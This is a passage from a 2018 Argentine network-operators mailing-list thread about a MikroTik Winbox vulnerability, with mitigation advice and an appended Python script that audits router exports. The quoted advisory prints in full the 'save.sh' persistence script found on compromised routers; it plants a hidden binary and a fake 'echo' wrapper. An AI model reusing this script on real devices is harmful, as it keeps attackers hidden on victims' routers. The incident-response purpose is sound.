<HTML><HEAD></HEAD>
<BODY dir=ltr>
<DIV dir=ltr>
<DIV style="FONT-SIZE: 12pt; FONT-FAMILY: 'Calibri'; COLOR: #000000">
<DIV> </DIV>
<DIV>We were victims of this about 10 days ago (which means it may have been
around for quite a while) on a CCR 1036 that was not sufficiently closed off to the
outside, and it happened exactly that way.... the suspicious part is that the first
thing it does (which shows up in the log) is “ip services changed by .....”, and it
must be a script that runs it, because the log entry has the same timestamp as the
login via Winbox.</DIV>
<DIV> </DIV>
<DIV>We did not find any apparent change in “ip services” (we checked everything
that can be seen on a CCR).</DIV>
<DIV> </DIV>
<DIV>It was a customer's, so it was updated (OS and firmware), the passwords were
changed and the device was closed to any outside service, and “apparently” it is
working normally (it is not under much demand, being a customer's).</DIV>
<DIV> </DIV>
<DIV>CAREFUL: there is nothing suspicious to see, so there may be many infected
devices, because that is all that shows up in the log until it gets overwritten.....
unless you are logging to a syslog.</DIV>
<DIV> </DIV>
<DIV>Regards</DIV>
<DIV> </DIV>
<DIV style="FONT-SIZE: 12pt; FONT-FAMILY: 'Calibri'; COLOR: #000000">Ing. Jose
Luis Gaspoz<BR>Internet Services S.A.<BR>Tel: 0342-4565118<BR>Cel:
342-5008523</DIV>
<DIV
style='FONT-SIZE: small; TEXT-DECORATION: none; FONT-FAMILY: "Calibri"; FONT-WEIGHT: normal; COLOR: #000000; FONT-STYLE: normal; DISPLAY: inline'>
<DIV style="FONT: 10pt tahoma">
<DIV> </DIV>
<DIV style="BACKGROUND: #f5f5f5">
<DIV style="font-color: black"><B>From:</B> <A title=carriers@dainus.net
href="mailto:carriers@dainus.net">Carriers</A> </DIV>
<DIV><B>Sent:</B> Tuesday, April 24, 2018 7:06 AM</DIV>
<DIV><B>To:</B> <A title=lista@arnog.com.ar
href="mailto:lista@arnog.com.ar">lista@arnog.com.ar</A> ; <A
title=lista@arnog.com.ar href="mailto:lista@arnog.com.ar">lista@arnog.com.ar</A>
</DIV>
<DIV><B>Subject:</B> Re: [Lista ArNOG] Mikrotik security
alert</DIV></DIV></DIV>
<DIV> </DIV></DIV>
<DIV
style='FONT-SIZE: small; TEXT-DECORATION: none; FONT-FAMILY: "Calibri"; FONT-WEIGHT: normal; COLOR: #000000; FONT-STYLE: normal; DISPLAY: inline'>
<DIV>Folks, watch out with that version. I had a couple of
problems: my pings went sky-high. Apparently there are changes in
routing.<BR><BR></DIV>
<DIV class=gmail_quote>On 24 April 2018 at 06:46, Juan Pablo Orsi <<A
href="mailto:juanpablo@internetlocal.com.ar"
target=_blank>juanpablo@internetlocal.com.ar</A>> wrote:
<BLOCKQUOTE class=gmail_quote
style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex; BORDER-LEFT: rgb(204,204,204) 1px solid">
<DIV class=entry-content
style="BOX-SIZING: border-box; BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; TEXT-ALIGN: justify; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit">
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Today
<A
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(33,117,155); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: transparent; font-stretch: inherit"
href="http://mikrotik.com/" target=_blank>MikroTik</A> published a<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"> <A
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: transparent; font-stretch: inherit"
href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255"
rel=noopener target=_blank><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">security
alert</SPAN></A> about a <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">vulnerability
in RouterOS that affects all versions since
v6.29.</SPAN></SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">According
to the alert, the vulnerability was discovered by MikroTik themselves and
they recommend updating <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">ASAP</SPAN>
(<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">as
soon as possible</SPAN>).</P>
<BLOCKQUOTE
style='BOX-SIZING: border-box; QUOTES: none; BORDER-TOP: 0px; FONT-FAMILY: georgia,"URW Bookman L",serif; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(68,68,68); PADDING-BOTTOM: 0px; FONT-STYLE: italic; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 30px 0px 60px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit'>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">The
vulnerability allows a “<EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">special
tool</EM>” to connect to the Winbox port and request the system's user
database.</SPAN></P></BLOCKQUOTE>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">To
take action on this, the following is recommended:</P>
<UL
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px 30px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Update
to<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
v6.42.1</SPAN> and <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">v6.43rc4</SPAN>
*<SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,102,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">With
caution</SPAN></SPAN> (read further below)</LI>
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Close
the Winbox port to public access</SPAN> using an <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">address
list</EM> and the <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">firewall</EM>
in the <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">input</EM> chain</LI>
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Limit
the allowed IP range</SPAN> in <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">ip
> service > winbox</EM> to local networks only.</LI>
<LI
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 4px 0px 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Change
user passwords.</SPAN></LI></UL>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">It
is important to bear in mind</SPAN> that in recent versions of <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">RouterOS</SPAN><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">
there is a new bridge handling scheme</SPAN>, so certain precautions
must be taken when upgrading, because there have been cases of failed
upgrades on configurations that have a bridge and use the switch
chip.</P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">For
devices that are in production where it is not possible to
update the operating system quickly, it is <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">mandatory
to close Winbox access and change user
passwords.</SPAN></SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">At
the moment it is not possible to know or detect whether the system has been compromised,
so applying the previous point is also recommended.</P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit"><FONT
color=#333333 face="Lato, sans-serif"><SPAN style="FONT-SIZE: 17px"><A
href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255">https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255</A></SPAN></FONT><BR></P>
<H4
style='BOX-SIZING: border-box; FONT-SIZE: 18px; BORDER-TOP: 0px; FONT-FAMILY: "Open Sans",sans-serif; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 300; COLOR: ; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 18px; BORDER-LEFT: 0px; LETTER-SPACING: 1px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 0px; font-stretch: inherit'><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(255,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">UPDATE</SPAN></SPAN>:</H4>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">Some
users are reporting that they find two files under <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">files</SPAN></EM>
named <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">dnstest</SPAN></EM>
with binary content and <SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">save.sh</EM>
</SPAN> with the following content:</P>
<PRE style='BOX-SIZING: border-box; OVERFLOW: auto; WORD-WRAP: break-word; MARGIN-BOTTOM: 24px; FONT-SIZE: 12px; BORDER-TOP: rgb(227,227,227) 1px dashed; FONT-FAMILY: monaco,consolas,"Lucida Console","Bitstream Vera Sans Mono",monospace; BORDER-RIGHT: rgb(227,227,227) 1px dashed; BACKGROUND: rgb(248,248,248); BORDER-BOTTOM: rgb(227,227,227) 1px dashed; WORD-BREAK: break-all; COLOR: rgb(0,0,0); PADDING-BOTTOM: 15px; PADDING-TOP: 15px; PADDING-LEFT: 15px; BORDER-LEFT: rgb(227,227,227) 1px dashed; MARGIN-TOP: 0px; LINE-HEIGHT: 1.62em; PADDING-RIGHT: 15px; font-stretch: inherit; border-radius: 4px'>#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</PRE>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><SPAN
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; FONT-WEIGHT: 600; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">The
attempt has the following behaviour:</SPAN></P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">As
can be seen in the following capture, the first access is a failed Winbox
attempt, from which it is presumed that it has access to the user DB. Then
the access is with the user with <EM
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit">full</EM> permissions.</P>
<P
style="BOX-SIZING: border-box; BORDER-TOP: 0px; FONT-FAMILY: inherit; BORDER-RIGHT: 0px; BORDER-BOTTOM: 0px; COLOR: rgb(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px 0px 24px; BORDER-LEFT: 0px; PADDING-RIGHT: 0px; font-stretch: inherit"><IMG
style="BORDER-LEFT-WIDTH: 0px; BOX-SIZING: border-box; MAX-WIDTH: 100%; HEIGHT: auto; FONT-FAMILY: inherit; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: middle; BORDER-BOTTOM-WIDTH: 0px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; font-stretch: inherit"
alt="Access behaviour"
src="https://i.imgur.com/7XbVAWy.png"></P></DIV><PRE class=blue><HR><BR>Lista mailing list<BR>Lista@arnog.com.ar<BR><A href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista">http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista</A><BR></PRE></BLOCKQUOTE></DIV>
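<P>The mitigation list in the quoted post (Winbox closed on the <EM>input</EM> chain via an address list, the service restricted in <EM>ip > service > winbox</EM>) and the point made at the top of the thread (log to a syslog, or the on-box log overwrites the only evidence) can be checked mechanically against a router's <EM>/export</EM>. The audit below is an added example written for this page; it is not code from the thread, from MikroTik or from ArNOG. The two export texts are constructed samples, and the list name <EM>mgmt</EM>, the logging action name <EM>remote-syslog</EM> and every address in them are choices made for the example.</P>

```python
"""Audit a RouterOS /export for the Winbox exposure discussed in this thread.

Added example, not code from the thread or from MikroTik. Checks: winbox service
restricted by address=, an input-chain pair accepting tcp/8291 only from an address
list and dropping it otherwise, and a remote syslog target. Exports are constructed.
"""
import shlex
from collections import defaultdict

WINBOX_PORT = "8291"

# Constructed: management access left at RouterOS defaults.
WEAK_EXPORT = r"""
/ip service
set telnet disabled=yes
set winbox port=8291
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input in-interface=bridge-lan
/system logging
add action=memory topics=info
"""

# Constructed: the same router after the advisory's mitigations (mgmt, remote-syslog
# and all addresses are names chosen for the example).
HARDENED_EXPORT = r"""
/ip firewall address-list
add address=192.168.88.0/24 comment="management LAN" list=mgmt
add address=203.0.113.10 comment="NOC jump host" list=mgmt
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input dst-port=8291 protocol=tcp src-address-list=mgmt
add action=drop chain=input comment="winbox from anywhere else" dst-port=8291 \
    protocol=tcp
/ip service
set winbox address=192.168.88.0/24,203.0.113.10 port=8291
/system logging action
add name=remote-syslog remote=192.0.2.20 remote-port=514 target=remote
/system logging
add action=remote-syslog topics=system,info
add action=remote-syslog topics=critical
"""


def parse_export(text):
    """Map each '/menu path' section to its add/set entries as dicts.

    Joins the trailing-backslash continuation lines RouterOS emits, lets shlex
    unquote values such as comment="...", and stores the item of 'set <item> ...'
    under '_target'. Other keys keep their RouterOS property names.
    """
    sections = defaultdict(list)
    section, pending = None, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        line, pending = pending + line, ""
        if line.startswith("/"):
            section = line
            continue
        verb, *fields = shlex.split(line)
        entry = {"_verb": verb}
        if verb == "set" and fields and "=" not in fields[0]:
            entry["_target"] = fields.pop(0)
        for field in fields:
            key, _, value = field.partition("=")
            entry[key] = value
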